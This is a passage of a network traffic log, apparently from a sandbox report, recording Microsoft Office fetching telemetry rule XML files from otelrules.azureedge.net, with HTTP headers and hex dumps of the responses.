xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken

Session ID	Source IP	Source Port	Destination IP	Destination Port
124	192.168.2.4	49875	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-30 11:48:53 UTC	192	OUT	GET /rules/rule702301v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-30 11:48:53 UTC	494	IN	HTTP/1.1 200 OK Date: Sat, 30 Nov 2024 11:48:53 GMT Content-Type: text/xml Content-Length: 1399 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:28:00 GMT ETag: "0x8DC582BE976026E" x-ms-request-id: 460b6522-701e-0097-5815-41b8c1000000 x-ms-version: 2018-03-28 x-azure-ref: 20241130T114853Z-174f7845968zgtf6hC1EWRqd8s0000000uc0000000003uqm x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-30 11:48:53 UTC	1399	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 6a 65 63 74 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 72 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702301" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Project.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPr

Session ID	Source IP	Source Port	Destination IP	Destination Port
125	192.168.2.4	49874	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-30 11:48:53 UTC	192	OUT	GET /rules/rule702750v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-30 11:48:54 UTC	494	IN	HTTP/1.1 200 OK Date: Sat, 30 Nov 2024 11:48:53 GMT Content-Type: text/xml Content-Length: 1366 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:54 GMT ETag: "0x8DC582BE5B7B174" x-ms-request-id: aae3b9cd-c01e-0079-6bb3-42e51a000000 x-ms-version: 2018-03-28 x-azure-ref: 20241130T114853Z-174f7845968frfdmhC1EWRxxbw00000011cg000000006pqw x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-30 11:48:54 UTC	1366	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 37 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 75 62 6c 69 73 68 65 72 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 75 62 6c 69 73 68 65 72 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702750" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Publisher" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPublisher" S="Medium" /> <F T="2

Session ID	Source IP	Source Port	Destination IP	Destination Port
126	192.168.2.4	49876	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-30 11:48:53 UTC	192	OUT	GET /rules/rule702300v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-30 11:48:54 UTC	494	IN	HTTP/1.1 200 OK Date: Sat, 30 Nov 2024 11:48:53 GMT Content-Type: text/xml Content-Length: 1362 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:37 GMT ETag: "0x8DC582BDC13EFEF" x-ms-request-id: e83b5619-a01e-000d-5811-41d1ea000000 x-ms-version: 2018-03-28 x-azure-ref: 20241130T114853Z-174f78459685m244hC1EWRgp2c0000001140000000009sdm x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-30 11:48:54 UTC	1362	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 6a 65 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 72 6f 6a 65 63 74 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702300" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Project" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenProject" S="Medium" /> <F T="2">

Session ID	Source IP	Source Port	Destination IP	Destination Port
127	192.168.2.4	49877	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-30 11:48:55 UTC	192	OUT	GET /rules/rule703401v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-30 11:48:55 UTC	494	IN	HTTP/1.1 200 OK Date: Sat, 30 Nov 2024 11:48:55 GMT Content-Type: text/xml Content-Length: 1425 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:55 GMT ETag: "0x8DC582BE6BD89A1" x-ms-request-id: 3266629f-e01e-0020-5891-3fde90000000 x-ms-version: 2018-03-28 x-azure-ref: 20241130T114855Z-174f7845968nxc96hC1EWRspw8000000111000000000940x x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-30 11:48:55 UTC	1425	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 34 30 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 67 72 61 6d 6d 61 62 6c 65 53 75 72 66 61 63 65 73 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703401" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ProgrammableSurfaces.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="Nexus

Session ID	Source IP	Source Port	Destination IP	Destination Port
128	192.168.2.4	49879	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-30 11:48:55 UTC	192	OUT	GET /rules/rule702501v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-30 11:48:56 UTC	494	IN	HTTP/1.1 200 OK Date: Sat, 30 Nov 2024 11:48:55 GMT Content-Type: text/xml Content-Length: 1415 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:57 GMT ETag: "0x8DC582BE7C66E85" x-ms-request-id: 6c879dfa-801e-0035-6714-41752a000000 x-ms-version: 2018-03-28 x-azure-ref: 20241130T114855Z-174f7845968cdxdrhC1EWRg0en000000119g000000007rcs x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-30 11:48:56 UTC	1415	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 35 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 67 72 61 6d 6d 61 62 69 6c 69 74 79 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702501" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Programmability.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenan

Session ID	Source IP	Source Port	Destination IP	Destination Port
129	192.168.2.4	49878	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-30 11:48:55 UTC	192	OUT	GET /rules/rule703400v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-30 11:48:56 UTC	494	IN	HTTP/1.1 200 OK Date: Sat, 30 Nov 2024 11:48:56 GMT Content-Type: text/xml Content-Length: 1388 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:37 GMT ETag: "0x8DC582BDBD9126E" x-ms-request-id: fc0d267c-101e-0079-0929-415913000000 x-ms-version: 2018-03-28 x-azure-ref: 20241130T114856Z-174f7845968xr5c2hC1EWRd0hn0000000k50000000008fsu x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-30 11:48:56 UTC	1388	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 34 30 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 67 72 61 6d 6d 61 62 6c 65 53 75 72 66 61 63 65 73 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 72 6f 67 72 61 6d 6d 61 62 6c 65 53 75 72 66 61 63 65 73 22 20 53 3d 22 4d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703400" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ProgrammableSurfaces" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenProgrammableSurfaces" S="M

Session ID	Source IP	Source Port	Destination IP	Destination Port
130	192.168.2.4	49881	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-30 11:48:55 UTC	192	OUT	GET /rules/rule700501v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-30 11:48:56 UTC	494	IN	HTTP/1.1 200 OK Date: Sat, 30 Nov 2024 11:48:56 GMT Content-Type: text/xml Content-Length: 1405 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:58 GMT ETag: "0x8DC582BE89A8F82" x-ms-request-id: 562f2249-001e-0028-5dab-42c49f000000 x-ms-version: 2018-03-28 x-azure-ref: 20241130T114856Z-174f7845968frfdmhC1EWRxxbw00000011e0000000004zsw x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-30 11:48:56 UTC	1405	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 35 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 6f 77 65 72 50 6f 69 6e 74 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700501" V="1" DC="SM" EN="Office.Telemetry.Event.Office.PowerPoint.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToke

Session ID	Source IP	Source Port	Destination IP	Destination Port
131	192.168.2.4	49880	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-30 11:48:55 UTC	192	OUT	GET /rules/rule702500v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-30 11:48:56 UTC	494	IN	HTTP/1.1 200 OK Date: Sat, 30 Nov 2024 11:48:56 GMT Content-Type: text/xml Content-Length: 1378 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:36 GMT ETag: "0x8DC582BDB813B3F" x-ms-request-id: 5818dd1d-501e-0035-4638-40c923000000 x-ms-version: 2018-03-28 x-azure-ref: 20241130T114856Z-174f7845968jrjrxhC1EWRmmrs00000011h0000000004xr0 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-30 11:48:56 UTC	1378	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 35 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 67 72 61 6d 6d 61 62 69 6c 69 74 79 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 72 6f 67 72 61 6d 6d 61 62 69 6c 69 74 79 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702500" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Programmability" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenProgrammability" S="Medium" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
132	192.168.2.4	49882	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-30 11:48:57 UTC	192	OUT	GET /rules/rule700500v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-30 11:48:58 UTC	494	IN	HTTP/1.1 200 OK Date: Sat, 30 Nov 2024 11:48:57 GMT Content-Type: text/xml Content-Length: 1368 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:53 GMT ETag: "0x8DC582BE51CE7B3" x-ms-request-id: 21a32f9a-a01e-003d-21b4-4298d7000000 x-ms-version: 2018-03-28 x-azure-ref: 20241130T114857Z-174f7845968swgbqhC1EWRmnb400000011mg000000002e6c x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-30 11:48:58 UTC	1368	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 35 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 6f 77 65 72 50 6f 69 6e 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 6f 77 65 72 50 6f 69 6e 74 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700500" V="1" DC="SM" EN="Office.Telemetry.Event.Office.PowerPoint" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPowerPoint" S="Medium" /> <F T=

Session ID	Source IP	Source Port	Destination IP	Destination Port
133	192.168.2.4	49884	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-30 11:48:57 UTC	192	OUT	GET /rules/rule702550v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-30 11:48:58 UTC	494	IN	HTTP/1.1 200 OK Date: Sat, 30 Nov 2024 11:48:58 GMT Content-Type: text/xml Content-Length: 1378 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:53 GMT ETag: "0x8DC582BE584C214" x-ms-request-id: dbe9ef63-901e-005b-3a83-3f2005000000 x-ms-version: 2018-03-28 x-azure-ref: 20241130T114858Z-174f7845968nxc96hC1EWRspw8000000117g000000000zf8 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-30 11:48:58 UTC	1378	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 35 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 72 73 6f 6e 61 6c 69 7a 61 74 69 6f 6e 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 65 72 73 6f 6e 61 6c 69 7a 61 74 69 6f 6e 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702550" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Personalization" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPersonalization" S="Medium" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
134	192.168.2.4	49883	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-30 11:48:57 UTC	192	OUT	GET /rules/rule702551v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-30 11:48:58 UTC	494	IN	HTTP/1.1 200 OK Date: Sat, 30 Nov 2024 11:48:58 GMT Content-Type: text/xml Content-Length: 1415 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:39 GMT ETag: "0x8DC582BDCE9703A" x-ms-request-id: 67f9b02f-701e-0053-4491-3f3a0a000000 x-ms-version: 2018-03-28 x-azure-ref: 20241130T114858Z-174f7845968kdththC1EWRzvxn0000000dqg000000006dq2 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-30 11:48:58 UTC	1415	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 35 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 72 73 6f 6e 61 6c 69 7a 61 74 69 6f 6e 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702551" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Personalization.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenan

Session ID	Source IP	Source Port	Destination IP	Destination Port
135	192.168.2.4	49885	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-30 11:48:58 UTC	192	OUT	GET /rules/rule701350v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-30 11:48:58 UTC	494	IN	HTTP/1.1 200 OK Date: Sat, 30 Nov 2024 11:48:58 GMT Content-Type: text/xml Content-Length: 1370 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:41 GMT ETag: "0x8DC582BDE62E0AB" x-ms-request-id: c2b29ccb-201e-0000-0bb4-42a537000000 x-ms-version: 2018-03-28 x-azure-ref: 20241130T114858Z-174f7845968pf68xhC1EWRr4h800000011n0000000005fd5 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
